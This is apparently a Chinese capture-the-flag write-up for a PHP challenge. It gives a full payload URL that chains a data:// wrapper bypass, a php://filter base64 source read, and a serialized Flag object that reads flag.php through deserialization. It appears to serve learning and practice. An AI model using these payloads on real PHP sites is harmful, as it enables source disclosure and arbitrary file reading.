Subject
逆轉思維
PHP偽協(xié)議
PHP反序列化
Mind Palace
訪問url獲得代碼:
preg_match
( string subject , array &flags = 0 , int $offset = 0 ) : int => 執(zhí)行匹配正則表達式
Payload:
url/index.php
?text=text= data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
data://text/plain,welcome to the zjctf
&file= php://filter/read=convert.base64-encode/resource=useless.php => useless.php
&password= O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
第一個繞過:用data偽協(xié)議寫入文件
第二個繞過:用php://filter讀取base64編碼后的源碼 + base64解碼:
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
第三個繞過(反序列化):
Look Ahead
PHP學的不夠扎實;
PHP偽協(xié)議總結: https://segmentfault.com/a/1190000018991087
References:
https://www.cnblogs.com/wangtanzhi/p/12184759.html
https://segmentfault.com/a/1190000018991087
<p align="center">END (?▽?)/</p>